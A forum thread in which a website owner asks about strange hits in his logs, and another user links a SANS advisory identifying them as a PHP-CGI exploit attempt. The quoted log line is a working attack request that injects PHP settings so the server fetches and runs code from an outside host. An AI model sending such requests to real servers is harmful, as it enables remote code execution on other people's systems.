Anyone know what is going on here?

[ecchi]

Looking at the logs for sorority-initiations.com I have a few hits to a page called:
/?-n+-dallow_url_include%3DOn+-dauto_prepend_file%3Dhttp://gofastdownload.com/rf/s.txt
(presumably http://sorority-initiations.com/?-n+-dallow_url_include%3DOn+-dauto_prepend_file%3Dhttp://gofastdownload.com/rf/s.txt but my stats program removes the domain name before recording the page name)
No page on my site is set up to accept a query string (Perl is used but only in include statements).
I'm more than a little worried as http://gofastdownload.com/rf/s.txt appears to be a PHP command to load the content of another page on that domain, and gofastdownload.com is a newish registered domain on a Russian server. So I am assuming that my domain is being used by some asshole to do something shitty, but I have no idea what!

Anyone any ideas?

Thanks.

[lezinterracial]

Did you find out what was going on?

I found this. Trying to exploit an old PHP hole?

https://isc.sans.edu/diary/PHP+vulne...the+wild/13312

[ecchi]

Quote:

Originally Posted by lezinterracial

Did you find out what was going on?

I found this. Trying to exploit an old PHP hole?

https://isc.sans.edu/diary/PHP+vulne...the+wild/13312

Thanks. I had not found what was being done, and unfortunately PHP is a language I don't know, so I don't understand most of what is on that site. However they appear to be saying that "it buggers about with PHP scripts on your site", and if that is the case I don't have a problem, because there aren't any PHP files on my site. Although there is, I guess, a PHP engine on the server.